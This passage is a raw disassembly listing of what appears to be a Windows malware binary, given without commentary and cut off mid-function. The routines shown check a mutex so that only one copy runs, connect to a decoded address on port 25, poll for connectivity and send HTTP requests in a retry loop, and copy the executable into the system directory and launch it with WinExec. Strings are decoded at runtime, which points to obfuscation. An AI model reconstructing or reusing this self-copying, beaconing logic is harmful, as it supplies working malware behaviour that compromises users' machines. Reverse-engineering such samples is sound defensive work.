shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
lea eax, [esp+490h+var_404]
pop edi
lea edx, [eax+1]
pop esi
loc_40B9E5: ; CODE XREF: sub_40B1E0+80A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40B9E5
mov ecx, [ebx+4]
sub eax, edx
push eax
lea eax, [esp+48Ch+var_404]
push eax
add ecx, 61Ch
push ecx
call sub_4045B0
mov ecx, [esp+494h+var_4]
add esp, 0Ch
pop ebx
call sub_4192B6
add esp, 484h
retn
sub_40B1E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40BA20 proc near ; CODE XREF: sub_40C950+5F�p
push 0Ah
push offset dword_429634
mov ecx, offset off_42AE60
call sub_406AE0
push eax
push 0
push 1F0001h
call dword_424120 ; OpenMutexA
test eax, eax
jz short loc_40BA46
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40BA46: ; CODE XREF: sub_40BA20+21�j
push 0Ah
push offset dword_429640
mov ecx, offset off_42AE60
call sub_406AE0
push eax
push 0
push 0
call dword_42411C ; CreateMutexA
mov eax, 1
retn
sub_40BA20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40BA70 proc near ; CODE XREF: sub_40C950+A6�p
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
sub esp, 14h
mov eax, dword_42A290
push esi
push 0
push 1
mov [esp+20h+var_4], eax
push 2
call dword_424260 ; socket
push 10h
push offset dword_42964C
mov ecx, offset off_42AE60
mov esi, eax
mov [esp+20h+var_14], 2
call sub_406AE0
push eax
call dword_42424C ; inet_addr
push 19h
mov [esp+1Ch+var_10], eax
call dword_424264 ; htons
mov [esp+18h+var_12], ax
push 10h
lea eax, [esp+1Ch+var_14]
push eax
push esi
call dword_424268 ; connect
push esi
call dword_42426C ; closesocket
mov ecx, [esp+18h+var_4]
pop esi
call sub_4192B6
add esp, 14h
retn
sub_40BA70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40BAE0 proc near ; CODE XREF: sub_403950+113�p
; sub_40C950+AE�p
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
sub esp, 0Ch
push ebx
push ebp
mov ebp, dword_424204
push esi
mov esi, ecx
push edi
mov [esp+1Ch+var_4], esi
loc_40BAF3: ; CODE XREF: sub_40BAE0+109�j
push 0
lea eax, [esp+20h+var_8]
push eax
call dword_42420C ; InternetGetConnectedState
test eax, eax
jz loc_40BBD6
test [esp+1Ch+var_8], 7
jz loc_40BBD6
push 0
push 0
push 0
push 0
push 0
call dword_424210 ; InternetOpenA
mov ebx, eax
test ebx, ebx
jnz short loc_40BB35
mov eax, [esp+1Ch+arg_0]
test eax, eax
jz loc_40BBEE
loc_40BB35: ; CODE XREF: sub_40BAE0+47�j
mov ecx, [esi+40h]
push 0
push 0
push 3
push 0
push 0
push 50h
push ecx
push ebx
call dword_424200 ; InternetConnectA
mov edi, eax
test edi, edi
jnz short loc_40BB5E
mov eax, [esp+1Ch+arg_0]
test eax, eax
jz loc_40BBFE
loc_40BB5E: ; CODE XREF: sub_40BAE0+70�j
mov edx, [esi+44h]
push 0
push 0
push 0
push 0
push 0
push edx
push 4
push offset dword_42965C
mov ecx, offset off_42AE60
call sub_406AE0
push eax
push edi
call dword_42421C ; HttpOpenRequestA
mov esi, eax
test esi, esi
jnz short loc_40BB93
mov eax, [esp+1Ch+arg_0]
test eax, eax
jz short loc_40BC11
loc_40BB93: ; CODE XREF: sub_40BAE0+A9�j
mov [esp+1Ch+var_C], 0
jmp short loc_40BBA0
; ---------------------------------------------------------------------------
align 10h
loc_40BBA0: ; CODE XREF: sub_40BAE0+BB�j
; sub_40BAE0+DF�j
push 0
push 0
push 0
push 0
push esi
call dword_424208 ; HttpSendRequestA
test eax, eax
jnz short loc_40BC27
mov eax, [esp+1Ch+var_C]
inc eax
cmp eax, 5
mov [esp+1Ch+var_C], eax
jl short loc_40BBA0
mov eax, [esp+1Ch+arg_0]
test eax, eax
push esi
jz short loc_40BC13
call ebp ; InternetCloseHandle
push edi
call ebp ; InternetCloseHandle
push ebx
call ebp ; InternetCloseHandle
mov esi, [esp+1Ch+var_4]
loc_40BBD6: ; CODE XREF: sub_40BAE0+22�j
; sub_40BAE0+2D�j
mov eax, [esp+1Ch+arg_0]
test eax, eax
jz short loc_40BC1B
push 493E0h
call dword_42408C ; Sleep
jmp loc_40BAF3
; ---------------------------------------------------------------------------
loc_40BBEE: ; CODE XREF: sub_40BAE0+4F�j
push 0
call ebp ; InternetCloseHandle
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
add esp, 0Ch
retn 4
; ---------------------------------------------------------------------------
loc_40BBFE: ; CODE XREF: sub_40BAE0+78�j
push 0
call ebp ; InternetCloseHandle
push ebx
call ebp ; InternetCloseHandle
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
add esp, 0Ch
retn 4
; ---------------------------------------------------------------------------
loc_40BC11: ; CODE XREF: sub_40BAE0+B1�j
push 0
loc_40BC13: ; CODE XREF: sub_40BAE0+E8�j
call ebp ; InternetCloseHandle
push edi
call ebp ; InternetCloseHandle
push ebx
call ebp ; InternetCloseHandle
loc_40BC1B: ; CODE XREF: sub_40BAE0+FC�j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
add esp, 0Ch
retn 4
; ---------------------------------------------------------------------------
loc_40BC27: ; CODE XREF: sub_40BAE0+D1�j
push esi
call ebp ; InternetCloseHandle
push edi
call ebp ; InternetCloseHandle
push ebx
call ebp ; InternetCloseHandle
pop edi
pop esi
pop ebp
mov eax, 1
pop ebx
add esp, 0Ch
retn 4
sub_40BAE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40BC40 proc near ; CODE XREF: sub_40BF40+11F�p
; sub_40BF40+38F�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
test eax, eax
jnz short loc_40BC4B
retn 4
; ---------------------------------------------------------------------------
loc_40BC4B: ; CODE XREF: sub_40BC40+6�j
push 0
push 80h
push 3
push 0
push 1
push 80000000h
push eax
call dword_424074 ; CreateFileA
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov eax, ecx
retn 4
sub_40BC40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40BC80 proc near ; CODE XREF: sub_40C480+20�p
var_1B4 = byte ptr -1B4h
var_1B0 = dword ptr -1B0h
var_1AC = byte ptr -1ACh
var_1A8 = byte ptr -1A8h
var_188 = byte ptr -188h
var_84 = byte ptr -84h
var_4 = dword ptr -4
sub esp, 1B4h
mov eax, dword_42A290
push 41h
push offset dword_429678
mov ecx, offset off_42AE60
mov [esp+1BCh+var_4], eax
call sub_406AE0
lea edx, [esp+1B4h+var_84]
lea ebx, [ebx+0]
loc_40BCB0: ; CODE XREF: sub_40BC80+38�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40BCB0
push 0Eh
push offset dword_4296BC
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+1B4h+var_1A8]
nop
loc_40BCD0: ; CODE XREF: sub_40BC80+58�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40BCD0
lea eax, [esp+1B4h+var_1B0]
push eax
push 1
push 0
lea ecx, [esp+1C0h+var_84]
push ecx
push 80000001h
call dword_424010 ; RegOpenKeyExA
test eax, eax
jnz short loc_40BD27
lea edx, [esp+1B4h+var_1AC]
push edx
lea eax, [esp+1B8h+var_188]
push eax
mov eax, [esp+1BCh+var_1B0]
lea ecx, [esp+1BCh+var_1B4]
push ecx
push 0
lea edx, [esp+1C4h+var_1A8]
push edx
push eax
mov dword ptr [esp+1CCh+var_1B4], 1
call dword_424014 ; RegQueryValueExA
test eax, eax
jz short loc_40BD2C
loc_40BD27: ; CODE XREF: sub_40BC80+78�j
mov [esp+1B4h+var_188], 0
loc_40BD2C: ; CODE XREF: sub_40BC80+A5�j
push esi
push edi
mov edi, offset byte_4243C3
lea esi, [esp+1BCh+var_188]
mov ecx, 1
xor edx, edx
repe cmpsb
jz loc_40BE33
lea eax, [esp+1BCh+var_188]
lea edx, [eax+1]
lea ecx, [ecx+0]
loc_40BD50: ; CODE XREF: sub_40BC80+D5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40BD50
sub eax, edx
cmp [esp+eax+1BCh+var_188], 5Ch
jz short loc_40BD91
lea eax, [esp+1BCh+var_188]
lea edx, [eax+1]
loc_40BD67: ; CODE XREF: sub_40BC80+EC�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40BD67
sub eax, edx
cmp [esp+eax+1BCh+var_188], 2Fh
jz short loc_40BD91
lea edi, [esp+1BCh+var_188]
dec edi
lea esp, [esp+0]
loc_40BD80: ; CODE XREF: sub_40BC80+106�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_40BD80
mov ax, word_4243BC
mov [edi], ax
loc_40BD91: ; CODE XREF: sub_40BC80+DE�j
; sub_40BC80+F5�j
push 0Ah
push offset dword_4296CC
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, eax
loc_40BDA4: ; CODE XREF: sub_40BC80+129�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40BDA4
lea edi, [esp+1BCh+var_188]
sub eax, edx
dec edi
loc_40BDB2: ; CODE XREF: sub_40BC80+138�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40BDB2
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
lea edi, [esp+1BCh+var_188]
dec edi
nop
loc_40BDD0: ; CODE XREF: sub_40BC80+156�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_40BDD0
mov cx, word_4243BC
push 9
mov [edi], cx
push offset dword_4296D8
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, eax
loc_40BDF5: ; CODE XREF: sub_40BC80+17A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40BDF5
lea edi, [esp+1BCh+var_188]
sub eax, edx
dec edi
loc_40BE03: ; CODE XREF: sub_40BC80+189�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40BE03
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
push 0
lea edx, [esp+1C0h+var_188]
and ecx, 3
push edx
rep movsb
call dword_424114 ; CreateDirectoryA
lea eax, [esp+1BCh+var_188]
push eax
call dword_424124 ; SetCurrentDirectoryA
loc_40BE33: ; CODE XREF: sub_40BC80+C0�j
mov ecx, [esp+1BCh+var_4]
pop edi
pop esi
call sub_4192B6
add esp, 1B4h
retn
sub_40BC80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40BE50 proc near ; CODE XREF: sub_40BF40+13E�p
; sub_40BF40+3AE�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
push edi
push esi
call sub_40E7E0
mov ebp, eax
add esp, 4
test ebp, ebp
jnz short loc_40BE70
push esi
call sub_40E6E0
add esp, 4
loc_40BE70: ; CODE XREF: sub_40BE50+15�j
mov ebx, [esp+10h+arg_8]
mov eax, [esp+10h+arg_4]
mov edx, ebx
sub edx, eax
lea esp, [esp+0]
loc_40BE80: ; CODE XREF: sub_40BE50+38�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_40BE80
mov eax, ebx
lea edx, [eax+1]
nop
loc_40BE90: ; CODE XREF: sub_40BE50+45�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40BE90
sub eax, edx
cmp byte ptr [eax+ebx], 5Ch
jz short loc_40BEB3
mov edi, ebx
dec edi
loc_40BEA2: ; CODE XREF: sub_40BE50+58�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_40BEA2
mov ax, word_4243BC
mov [edi], ax
loc_40BEB3: ; CODE XREF: sub_40BE50+4D�j
mov eax, esi
mov edx, esi
loc_40BEB7: ; CODE XREF: sub_40BE50+6C�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40BEB7
mov edi, ebx
sub eax, edx
dec edi
loc_40BEC3: ; CODE XREF: sub_40BE50+79�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40BEC3
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
and ecx, 3
test ebp, ebp
rep movsb
jnz short loc_40BF18
push 5
push offset dword_4296F4
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, eax
loc_40BEF2: ; CODE XREF: sub_40BE50+A7�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40BEF2
sub eax, edx
dec ebx
mov edi, ebx
mov edi, edi
loc_40BF00: ; CODE XREF: sub_40BE50+B6�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40BF00
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
loc_40BF18: ; CODE XREF: sub_40BE50+8D�j
pop edi
pop esi
pop ebp
pop ebx
retn 0Ch
sub_40BE50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40BF20 proc near ; CODE XREF: sub_40C950+159�p
mov ecx, [ecx+0Ch]
xor eax, eax
test ecx, ecx
jz short locret_40BF38
lea esp, [esp+0]
loc_40BF30: ; CODE XREF: sub_40BF20+16�j
mov ecx, [ecx+4]
inc eax
test ecx, ecx
jnz short loc_40BF30
locret_40BF38: ; CODE XREF: sub_40BF20+7�j
retn
sub_40BF20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40BF40 proc near ; CODE XREF: sub_40C950+31�p
var_314 = dword ptr -314h
var_310 = byte ptr -310h
var_308 = byte ptr -308h
var_20C = byte ptr -20Ch
var_108 = byte ptr -108h
var_4 = dword ptr -4
sub esp, 314h
mov eax, dword_42A290
push ebp
mov ebp, ecx
mov ecx, [ebp+4]
mov edx, [ecx+6C4h]
mov [esp+318h+var_4], eax
mov eax, 1
cmp edx, eax
jg loc_40C3B6
push esi
push edi
push 104h
lea edx, [esp+324h+var_108]
push edx
call dword_424128 ; GetSystemDirectoryA
test eax, eax
jbe loc_40C3AF
lea eax, [esp+320h+var_108]
push eax
call sub_419A76
mov edx, [ebp+4]
lea ecx, [esp+324h+var_108]
push ecx
add edx, 108h
push edx
call sub_4199F0
add esp, 0Ch
test eax, eax
jnz loc_40C3AF
jmp short loc_40BFC0
; ---------------------------------------------------------------------------
align 10h
loc_40BFC0: ; CODE XREF: sub_40BF40+77�j
; sub_40BF40+8E�j
mov cl, [esp+eax+320h+var_108]
mov [esp+eax+320h+var_310], cl
inc eax
test cl, cl
jnz short loc_40BFC0
xor eax, eax
jmp short loc_40BFE0
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h, 4 dup(0)
; ---------------------------------------------------------------------------
jmp short loc_40BFE0
; ---------------------------------------------------------------------------
align 10h
loc_40BFE0: ; CODE XREF: sub_40BF40+92�j
; sub_40BF40+9B�j ...
mov cl, [esp+eax+320h+var_108]
mov [esp+eax+320h+var_20C], cl
inc eax
test cl, cl
jnz short loc_40BFE0
lea eax, [esp+320h+var_310]
lea edx, [eax+1]
lea ebx, [ebx+0]
loc_40C000: ; CODE XREF: sub_40BF40+C5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40C000
sub eax, edx
cmp [esp+eax+320h+var_310], 5Ch
jz short loc_40C026
lea edi, [esp+320h+var_310]
dec edi
loc_40C015: ; CODE XREF: sub_40BF40+DB�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_40C015
mov ax, word_4243BC
mov [edi], ax
loc_40C026: ; CODE XREF: sub_40BF40+CE�j
mov eax, [ebp+4]
add eax, 4
mov edx, eax
mov edi, edi
loc_40C030: ; CODE XREF: sub_40BF40+F5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40C030
lea edi, [esp+320h+var_310]
sub eax, edx
dec edi
mov edi, edi
loc_40C040: ; CODE XREF: sub_40BF40+106�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40C040
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
lea ecx, [esp+320h+var_310]
push ecx
mov ecx, ebp
call sub_40BC40
test eax, eax
jnz short loc_40C0A1
mov ecx, [ebp+4]
lea edx, [esp+320h+var_310]
push edx
lea eax, [esp+324h+var_108]
add ecx, 4
push eax
push ecx
mov ecx, ebp
call sub_40BE50
mov eax, [ebp+4]
push 0
lea edx, [esp+324h+var_310]
push edx
add eax, 108h
push eax
call dword_424110 ; CopyFileA
test eax, eax
jz loc_40C13F
loc_40C0A1: ; CODE XREF: sub_40BF40+126�j
lea ecx, [esp+320h+var_20C]
push ecx
call dword_424124 ; SetCurrentDirectoryA
mov edx, [ebp+4]
mov eax, [edx+6CCh]
lea edi, [esp+318h+var_308]
dec edi
test eax, eax
jz short loc_40C100
loc_40C0C1: ; CODE XREF: sub_40BF40+187�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_40C0C1
mov ax, word_42451C
mov cl, byte_42451E
mov [edi], ax
mov [edi+2], cl
push 1
lea ecx, [esp+31Ch+var_308]
push ecx
call dword_4240B0 ; WinExec
pop edi
pop esi
xor eax, eax
pop ebp
mov ecx, [esp+314h+var_4]
call sub_4192B6
add esp, 314h
retn
; ---------------------------------------------------------------------------
loc_40C100: ; CODE XREF: sub_40BF40+17F�j
; sub_40BF40+1C6�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_40C100
mov dx, word_424518
mov al, byte_42451A
push 1
lea ecx, [esp+31Ch+var_308]
mov [edi], dx
push ecx
mov [edi+2], al
call dword_4240B0 ; WinExec
pop edi
pop esi
xor eax, eax
pop ebp
mov ecx, [esp+314h+var_4]
call sub_4192B6
add esp, 314h
retn
; ---------------------------------------------------------------------------
loc_40C13F: ; CODE XREF: sub_40BF40+15B�j
mov edx, [ebp+1Ch]
mov ecx, [edx+74h]
mov eax, ecx
lea esi, [eax+1]
lea ebx, [ebx+0]
loc_40C150: ; CODE XREF: sub_40BF40+215�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40C150
sub eax, esi
mov [esp+320h+var_314], eax
jz loc_40C3AF
lea edx, [esp+320h+var_310]
loc_40C167: ; CODE XREF: sub_40BF40+22F�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
test al, al
jnz short loc_40C167
lea eax, [esp+320h+var_310]
lea edx, [eax+1]
loc_40C178: ; CODE XREF: sub_40BF40+23D�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40C178
sub eax, edx
cmp [esp+eax+320h+var_310], 5Ch
jz short loc_40C1A1
lea edi, [esp+320h+var_310]
dec edi
lea ecx, [ecx+0]
loc_40C190: ; CODE XREF: sub_40BF40+256�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_40C190
mov ax, word_4243BC
mov [edi], ax
loc_40C1A1: ; CODE XREF: sub_40BF40+246�j
push 0Ah
push offset dword_429660
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, eax
loc_40C1B4: ; CODE XREF: sub_40BF40+279�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40C1B4
lea edi, [esp+320h+var_310]
sub eax, edx
dec edi
loc_40C1C2: ; CODE XREF: sub_40BF40+288�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40C1C2
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
lea edi, [esp+320h+var_310]
dec edi
nop
loc_40C1E0: ; CODE XREF: sub_40BF40+2A6�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_40C1E0
mov cx, word_4243BC
push 9
mov [edi], cx
push offset dword_42966C
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, eax
loc_40C205: ; CODE XREF: sub_40BF40+2CA�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40C205
lea edi, [esp+320h+var_310]
sub eax, edx
dec edi
loc_40C213: ; CODE XREF: sub_40BF40+2D9�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40C213
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
push 0
lea edx, [esp+324h+var_310]
and ecx, 3
push edx
rep movsb
call dword_424114 ; CreateDirectoryA
xor eax, eax
lea ebx, [ebx+0]
loc_40C240: ; CODE XREF: sub_40BF40+30E�j
mov cl, [esp+eax+320h+var_310]
mov [esp+eax+320h+var_20C], cl
inc eax
test cl, cl
jnz short loc_40C240
lea eax, [esp+320h+var_20C]
push eax
call sub_419A76
mov edx, [ebp+4]
lea ecx, [esp+324h+var_20C]
push ecx
add edx, 108h
push edx
call sub_4199F0
add esp, 0Ch
test eax, eax
jnz loc_40C3AF
lea edi, [esp+320h+var_310]
dec edi
loc_40C284: ; CODE XREF: sub_40BF40+34A�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_40C284
mov ax, word_4243BC
mov [edi], ax
mov eax, [ebp+4]
add eax, 4
mov edx, eax
lea ecx, [ecx+0]
loc_40C2A0: ; CODE XREF: sub_40BF40+365�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40C2A0
lea edi, [esp+320h+var_310]
sub eax, edx
dec edi
mov edi, edi
loc_40C2B0: ; CODE XREF: sub_40BF40+376�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40C2B0
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
lea ecx, [esp+320h+var_310]
push ecx
mov ecx, ebp
call sub_40BC40
test eax, eax
jnz short loc_40C309
mov ecx, [ebp+4]
lea edx, [esp+320h+var_310]
push edx
lea eax, [esp+324h+var_20C]
add ecx, 4
push eax
push ecx
mov ecx, ebp
call sub_40BE50
mov eax, [ebp+4]
push 0
lea edx, [esp+324h+var_310]
push edx
add eax, 108h
push eax
call dword_424110 ; CopyFileA
loc_40C309: ; CODE XREF: sub_40BF40+396�j
lea ecx, [esp+320h+var_20C]
push ecx
call dword_424124 ; SetCurrentDirectoryA
mov edx, [ebp+4]
mov eax, [edx+6CCh]
lea edi, [esp+318h+var_308]
dec edi
test eax, eax
jz short loc_40C370
lea esp, [esp+0]
loc_40C330: ; CODE XREF: sub_40BF40+3F6�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_40C330
mov ax, word_42451C
mov cl, byte_42451E
mov [edi], ax
mov [edi+2], cl
push 1
lea ecx, [esp+31Ch+var_308]
push ecx
call dword_4240B0 ; WinExec
pop edi
pop esi
xor eax, eax
pop ebp
mov ecx, [esp+314h+var_4]
call sub_4192B6
add esp, 314h
retn
; ---------------------------------------------------------------------------
align 10h
loc_40C370: ; CODE XREF: sub_40BF40+3E7�j
; sub_40BF40+436�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_40C370
mov dx, word_424518
mov al, byte_42451A
push 1
lea ecx, [esp+31Ch+var_308]
mov [edi], dx
push ecx
mov [edi+2], al
call dword_4240B0 ; WinExec
pop edi
pop esi
xor eax, eax
pop ebp
mov ecx, [esp+314h+var_4]
call sub_4192B6
add esp, 314h
retn
; ---------------------------------------------------------------------------
loc_40C3AF: ; CODE XREF: sub_40BF40+42�j
; sub_40BF40+71�j ...
pop edi
mov eax, 1
pop esi
loc_40C3B6: ; CODE XREF: sub_40BF40+25�j
mov ecx, [esp+318h+var_4]
pop ebp
call sub_4192B6
add esp, 314h
retn
sub_40BF40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40C3D0 proc near ; CODE XREF: sub_408720+7�p
; sub_408740+14�p ...
arg_0 = dword ptr 4
push esi
mov esi, [ecx+10h]
test esi, esi
jnz short loc_40C3DE
xor eax, eax
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_40C3DE: ; CODE XREF: sub_40C3D0+6�j
mov edx, [esp+4+arg_0]
mov eax, 1
cmp edx, eax
push edi
jl short loc_40C400
mov edi, [ecx+0Ch]
nop
loc_40C3F0: ; CODE XREF: sub_40C3D0+2E�j
cmp esi, edi
jz short loc_40C400
test esi, esi
jz short loc_40C41C
mov esi, [esi+8]
inc eax
cmp eax, edx
jle short loc_40C3F0
loc_40C400: ; CODE XREF: sub_40C3D0+1A�j
; sub_40C3D0+22�j
mov eax, [esi+8]
test eax, eax
jz short loc_40C42B
mov edx, [esi+4]
mov [eax+4], edx
mov eax, [esi+4]
test eax, eax
jz short loc_40C423
mov edx, [esi+8]
mov [eax+8], edx
jmp short loc_40C451
; ---------------------------------------------------------------------------
loc_40C41C: ; CODE XREF: sub_40C3D0+26�j
pop edi
xor eax, eax
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_40C423: ; CODE XREF: sub_40C3D0+42�j
mov eax, [esi+8]
mov [ecx+10h], eax
jmp short loc_40C451
; ---------------------------------------------------------------------------
loc_40C42B: ; CODE XREF: sub_40C3D0+35�j
mov eax, [esi+4]
test eax, eax
jz short loc_40C443
mov edx, eax
mov dword ptr [edx+8], 0
mov eax, [esi+4]
mov [ecx+0Ch], eax
jmp short loc_40C451
; ---------------------------------------------------------------------------
loc_40C443: ; CODE XREF: sub_40C3D0+60�j
mov dword ptr [ecx+10h], 0
mov dword ptr [ecx+0Ch], 0
loc_40C451: ; CODE XREF: sub_40C3D0+4A�j
; sub_40C3D0+59�j ...
mov eax, [ecx+14h]
test eax, eax
mov edx, [ecx+10h]
mov [ecx+18h], edx
jz short loc_40C46A
mov ecx, [esi]
test ecx, ecx
jz short loc_40C46A
mov eax, [ecx]
push 1
call dword ptr [eax]
loc_40C46A: ; CODE XREF: sub_40C3D0+8C�j
; sub_40C3D0+92�j
push esi
call sub_41930D
add esp, 4
pop edi
mov eax, 1
pop esi
retn 4
sub_40C3D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40C480 proc near ; CODE XREF: sub_40CCF0+37�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push 0FFFFFFFFh
push offset SEH_40C480
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ebx
push esi
mov esi, ecx
mov dword ptr [esi], offset off_424520
call sub_40BC80
xor ebx, ebx
push ebx
mov [esi+0Ch], ebx
call sub_419875
push eax
call sub_419846
push 7114h
mov [esi+48h], ebx
mov [esi+4Ch], ebx
call sub_4191C1
add esp, 0Ch
mov [esp+18h+var_10], eax
cmp eax, ebx
mov [esp+18h+var_4], ebx
jz short loc_40C4E2
mov ecx, [esi+0Ch]
push ecx
mov ecx, eax
call sub_40A650
jmp short loc_40C4E4
; ---------------------------------------------------------------------------
loc_40C4E2: ; CODE XREF: sub_40C480+53�j
xor eax, eax
loc_40C4E4: ; CODE XREF: sub_40C480+60�j
push edi
or edi, 0FFFFFFFFh
push 6D8h
mov [esp+20h+var_4], edi
mov [esi+10h], eax
call sub_4191C1
add esp, 4
mov [esp+1Ch+var_10], eax
cmp eax, ebx
mov [esp+1Ch+var_4], 1
jz short loc_40C519
mov edx, [esi+0Ch]
push edx
mov ecx, eax
call sub_4057A0
jmp short loc_40C51B
; ---------------------------------------------------------------------------
loc_40C519: ; CODE XREF: sub_40C480+8A�j
xor eax, eax
loc_40C51B: ; CODE XREF: sub_40C480+97�j
push 30h
mov [esp+20h+var_4], edi
mov [esi+4], eax
call sub_4191C1
add esp, 4
mov [esp+1Ch+var_10], eax
cmp eax, ebx
mov [esp+1Ch+var_4], 2
jz short loc_40C549
mov ecx, [esi+0Ch]
push ecx
mov ecx, eax
call sub_408A20
jmp short loc_40C54B
; ---------------------------------------------------------------------------
loc_40C549: ; CODE XREF: sub_40C480+BA�j
xor eax, eax
loc_40C54B: ; CODE XREF: sub_40C480+C7�j
push 34h
mov [esp+20h+var_4], edi
mov [esi+8], eax
call sub_4191C1
add esp, 4
mov [esp+1Ch+var_10], eax
cmp eax, ebx
mov [esp+1Ch+var_4], 3
jz short loc_40C579
mov edx, [esi+0Ch]
push edx
mov ecx, eax
call sub_408B20
jmp short loc_40C57B
; ---------------------------------------------------------------------------
loc_40C579: ; CODE XREF: sub_40C480+EA�j
xor eax, eax
loc_40C57B: ; CODE XREF: sub_40C480+F7�j
push 24h
mov [esp+20h+var_4], edi
mov [esi+20h], eax
call sub_4191C1
add esp, 4
mov [esp+1Ch+var_10], eax
cmp eax, ebx
mov [esp+1Ch+var_4], 4
jz short loc_40C5A9
mov ecx, [esi+0Ch]
push ecx
mov ecx, eax
call sub_40AA90
jmp short loc_40C5AB
; ---------------------------------------------------------------------------
loc_40C5A9: ; CODE XREF: sub_40C480+11A�j
xor eax, eax
loc_40C5AB: ; CODE XREF: sub_40C480+127�j
push 78h
mov [esp+20h+var_4], edi
mov [esi+24h], eax
call sub_4191C1
add esp, 4
mov [esp+1Ch+var_10], eax
cmp eax, ebx
mov [esp+1Ch+var_4], 5
jz short loc_40C5DD
mov edx, [esi+0Ch]
mov ecx, [esi+4]
push edx
push ecx
mov ecx, eax
call sub_405C80
jmp short loc_40C5DF
; ---------------------------------------------------------------------------
loc_40C5DD: ; CODE XREF: sub_40C480+14A�j
xor eax, eax
loc_40C5DF: ; CODE XREF: sub_40C480+15B�j
push 104h
mov [esp+20h+var_4], edi
mov [esi+1Ch], eax
call sub_4191C1
add esp, 4
mov [esp+1Ch+var_10], eax
cmp eax, ebx
